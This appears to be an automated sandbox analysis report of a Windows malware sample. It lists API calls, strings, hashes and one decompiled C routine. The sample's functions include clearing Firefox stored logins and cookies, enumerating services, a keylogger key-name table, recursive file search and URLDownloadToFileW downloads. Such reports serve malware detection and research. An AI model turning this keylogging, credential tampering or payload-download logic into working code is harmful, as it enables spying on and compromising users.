                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V?$basic_string@$D@1@@V10@$V01@@$??4?$basic_string@FileFindV01@$?c_str@?$basic_string@$CloseDeleteFirstNextV10@@getenv
                                                                                • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                • API String ID: 3375041920-3681987949
                                                                                • Opcode ID: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                                                                • Instruction ID: c62cee961eeb0feb44b1f04b02d1ffc3ba69f98c32627a35338bed2311f0f042
                                                                                • Opcode Fuzzy Hash: 121eb6264435a5b459c7dd4d2d187141a78bef96a0fd1a1fea0ffd8da6d83978
                                                                                • Instruction Fuzzy Hash: 69712E71C0460EEBCB009BE0DC59DEEBF78AF55355F004176E812E31A0EB74668ACB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004113C9, Relevance: 73.8, APIs: 49, Instructions: 252serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004), ref: 004113D9
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004113F2
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,0041B320), ref: 00411408
                                                                                • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,?,00000000,?,00410E95,?), ref: 00411438
                                                                                • GetLastError.KERNEL32 ref: 00411442
                                                                                • malloc.MSVCRT ref: 00411458
                                                                                • EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,?,?,00410E95,?), ref: 00411477
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041149B
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114A9
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114B5
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114BE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114CA
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 004114DB
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004114E8
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004114F4
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004114FD
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411509
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416AFC,?), ref: 0041151A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@$??1?$basic_string@$EnumG@2@@0@Hstd@@ServicesStatusV01@V01@@V10@@V?$basic_string@Y?$basic_string@$ErrorLastManagerOpenmalloc
                                                                                • String ID:
                                                                                • API String ID: 2829549728-0
                                                                                • Opcode ID: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                                                                • Instruction ID: fe864d2e3db6e374d855c0a4c4208b99666831e449a430f346264da0072ddcf9
                                                                                • Opcode Fuzzy Hash: 58d2b0112fed52923091006d7e237b5b1c9f5be96fd222045ae4672482f29bf9
                                                                                • Instruction Fuzzy Hash: 5EA1E672C0051AEBCB15DBA0EC98EEEBB78FF58305F04806AF516A2160EB755A45CF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040751B, Relevance: 61.4, APIs: 30, Strings: 5, Instructions: 190fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,0001781A,00000000), ref: 0040752D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040753A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\AppData\Roaming\Mozilla\Firefox\Profiles\,00000000), ref: 0040754C
                                                                                • getenv.MSVCRT ref: 00407558
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000), ref: 00407564
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407570
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407579
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407582
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00415BC8,?), ref: 0040759C
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?), ref: 004075A6
                                                                                • FindFirstFileA.KERNEL32(00000000,?,?,?), ref: 004075AD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004075B9
                                                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 004075C7
                                                                                • FindNextFileA.KERNEL32(000000FF,?,?,?,?), ref: 004075F0
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?,\cookies.sqlite,?,?,?), ref: 0040768B
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,\cookies.sqlite,?,?,?), ref: 00407698
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076A4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076AD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076B6
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076BF
                                                                                • DeleteFileA.KERNEL32(00000000,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076C6
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076D0
                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 004076EC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Firefox cookies found, cleared!],00000000,?,?,?,?,?,?,?,?,?,\cookies.sqlite,?,?,?), ref: 00407704
                                                                                  • Part of subcall function 00407A90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000,?,004078A9), ref: 00407A9E
                                                                                  • Part of subcall function 00407A90: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000,?,004078A9), ref: 00407AB1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407717
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,\cookies.sqlite), ref: 00407720
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@FindHstd@@V?$basic_string@$FileV01@@V10@$??4?$basic_string@?c_str@?$basic_string@CloseV01@$DeleteErrorFirstLastNextV10@@getenv
                                                                                • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                • API String ID: 2907366228-432212279
                                                                                • Opcode ID: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                                                                • Instruction ID: 2cb50fe65e7b882f74eabaaae12ed0bec9aebdba7c4873397d04c6de05a2bb48
                                                                                • Opcode Fuzzy Hash: 9845358802cc4021ee10908d941d9cf2529172c7ae7851ae6f730565a28c10f6
                                                                                • Instruction Fuzzy Hash: 0C61A431C0460DEBCB00AFB4DC599EEBB78EF55355F004572E812E3290EB75668ACB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404C0A, Relevance: 60.2, APIs: 40, Instructions: 202fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 16%
                                                                                			E00404C0A(intOrPtr* __ecx, char _a4, char _a20) {
				char _v5;
				void* _v12;
				char _v13;
				char _v14;
				void* _v32;
				char _v48;
				short _v64;
				char _v80;
				char _v96;
				void* _v112;
				char _v128;
				char _v144;
				struct _WIN32_FIND_DATAW _v736;
				char* _t73;
				struct _WIN32_FIND_DATAW* _t75;
				void* _t79;
				void* _t81;
				signed int _t96;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				signed int _t145;

				_t137 = __ecx;
				_t60 =  &_v5;
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
				E0040504F( &_v5,  &_v5, _t60, __imp__tolower);
				L00414146();
				_t141 = _t139 + 0x1c;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_a4, "*",  &_v736);
				_v12 = FindFirstFileW( &_v64,  &_v64);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v12 == 0xffffffff) {
					L11:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return 1;
				}
				while(FindNextFileW(_v12,  &_v736) != 0) {
					if((_v736.dwFileAttributes & 0x00000010) != 0 && wcscmp( &(_v736.cFileName), ".") != 0 && wcscmp( &(_v736.cFileName), L"..") != 0) {
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_v5, 0x5c);
						L0041414C();
						L00414152();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						_t141 = _t141 + 0x18;
						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z();
						E00404C0A(_t137,  &_v64,  &_a20,  &_v64,  &_v144,  &_v144,  &_a4,  &(_v736.cFileName),  &(_v736.cFileName));
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					}
					_t71 =  &(_v736.cFileName);
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &(_v736.cFileName),  &_v14);
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					__imp__?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ();
					E0040504F( &(_v736.cFileName),  &(_v736.cFileName), _t71, __imp__tolower);
					_t141 = _t141 + 0x10;
					_t73 =  &_a20;
					__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z(_t73, 0);
					if(_t73 ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
						L8:
						__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
						continue;
					} else {
						_t75 =  &_v736;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t75, 0x250,  &_v13);
						__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t75);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						_t145 = _t141 - 0x10;
						_t96 = _t145;
						_t79 = E00412855( &_v80,  &_v128,  &_a4);
						_t80 =  &_v96;
						L00414140();
						L00414140();
						_t81 = E00402440( &_v96, 0x66, _t96,  &_v96, _t80, _t79, 0x41b310);
						_t141 = _t145 + 0x30;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ( &_v48,  *_t137);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						if((_t96 & 0xffffff00 | _t81 == 0xffffffff) != 0) {
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
							return 0;
						}
						goto L8;
					}
				}
				FindClose(_v12);
				goto L11;
			}

























                                                                                0x00404c16
                                                                                0x00404c18
                                                                                0x00404c1f
                                                                                0x00404c2f
                                                                                0x00404c39
                                                                                0x00404c43
                                                                                0x00404c4a
                                                                                0x00404c66
                                                                                0x00404c6b
                                                                                0x00404c70
                                                                                0x00404c80
                                                                                0x00404c83
                                                                                0x00404c8d
                                                                                0x00404e83
                                                                                0x00404e86
                                                                                0x00404e8f
                                                                                0x00404e98
                                                                                0x00000000
                                                                                0x00404e9e
                                                                                0x00404c93
                                                                                0x00404cb2
                                                                                0x00404cfa
                                                                                0x00404d0c
                                                                                0x00404d19
                                                                                0x00404d27
                                                                                0x00404d30
                                                                                0x00404d3f
                                                                                0x00404d45
                                                                                0x00404d4e
                                                                                0x00404d56
                                                                                0x00404d5e
                                                                                0x00404d5e
                                                                                0x00404d6b
                                                                                0x00404d72
                                                                                0x00404d7c
                                                                                0x00404d86
                                                                                0x00404d90
                                                                                0x00404d97
                                                                                0x00404d9c
                                                                                0x00404d9f
                                                                                0x00404da8
                                                                                0x00404db6
                                                                                0x00404e44
                                                                                0x00404e47
                                                                                0x00000000
                                                                                0x00404dbc
                                                                                0x00404dc3
                                                                                0x00404dcf
                                                                                0x00404dd9
                                                                                0x00404de2
                                                                                0x00404ded
                                                                                0x00404df0
                                                                                0x00404e00
                                                                                0x00404e08
                                                                                0x00404e0c
                                                                                0x00404e16
                                                                                0x00404e20
                                                                                0x00404e25
                                                                                0x00404e31
                                                                                0x00404e3a
                                                                                0x00404e42
                                                                                0x00404e55
                                                                                0x00404e5e
                                                                                0x00404e67
                                                                                0x00404e70
                                                                                0x00000000
                                                                                0x00404e76
                                                                                0x00000000
                                                                                0x00404e42
                                                                                0x00404db6
                                                                                0x00404e7d
                                                                                0x00000000

                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310,?,00018426), ref: 00404C1F
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00018430,?,00018426), ref: 00404C2F
                                                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00018426), ref: 00404C39
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00018426), ref: 00404C43
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C,?), ref: 00404C66
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00404C70
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00404C77
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404C83
                                                                                • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00404C9D
                                                                                • wcscmp.MSVCRT ref: 00404CCA
                                                                                • wcscmp.MSVCRT ref: 00404CE2
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00404CFA
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00404D0C
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00404D19
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D27
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D30
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D3F
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404D4E
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00404D5E
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E55
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E5E
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E67
                                                                                  • Part of subcall function 00404C0A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E70
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00404D72
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00018430,?,?,?), ref: 00404D7C
                                                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D86
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00404D90
                                                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00404DA8
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00404DCF
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00404DD9
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00404DE2
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041B310,?), ref: 00404E0C
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 00404E16
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E31
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E3A
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404E47
                                                                                • FindClose.KERNEL32(000000FF,?,?,?), ref: 00404E7D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E86
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E8F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00404E98
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$D@std@@$D@2@@std@@$??0?$basic_string@$Hstd@@V?$basic_string@$?begin@?$basic_string@$FindG@2@@0@V01@@V10@0@$?end@?$basic_string@D@1@@D@2@@0@FileG@1@@V10@wcscmp$??4?$basic_string@?c_str@?$basic_string@?find@?$basic_string@CloseFirstNextV01@V12@
                                                                                • String ID:
                                                                                • API String ID: 1504175218-0
                                                                                • Opcode ID: 46ead55cb45668728e11acff74b5d39d496273f5026c6432a1d87f7a2836c74c
                                                                                • Instruction ID: e99c239ae8235e7f5c20d0f9326128258c52c2c7d0b7d23e31a82f6e10cc2207
                                                                                • Opcode Fuzzy Hash: 46ead55cb45668728e11acff74b5d39d496273f5026c6432a1d87f7a2836c74c
                                                                                • Instruction Fuzzy Hash: 8A711E7280050EEBCB04EFA0EC899EE777CEF94345F548066F516A31A0EB745649CF98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405EB2, Relevance: 53.4, APIs: 3, Strings: 27, Instructions: 882COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [F7] ,?,00000001,?,745E73F0,?), ref: 0040616A
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B28,?), ref: 004066F4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B04,?,?,?,?,00000001), ref: 00406846
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                                                                • String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up]
                                                                                • API String ID: 4257247948-3968991301
                                                                                • Opcode ID: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                                                                • Instruction ID: 32f1d40ca48953741c1d4852e97a1265af2d0dfb925f912298a01a30ea5beda6
                                                                                • Opcode Fuzzy Hash: eb2eccc8a731812359348b3976dfce5ea5e72dbce140fbb5fce39ed4468e0386
                                                                                • Instruction Fuzzy Hash: 7D32B072A04509BBDB04B6ACC996CFF3A7DE641340B51097BE813B71C2F839596852EF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D4E5, Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 132filenetworkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D4FC
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D523
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D536
                                                                                  • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D551
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040D55C
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040D57D
                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,?,00000000), ref: 0040D585
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,?,00000000), ref: 0040D590
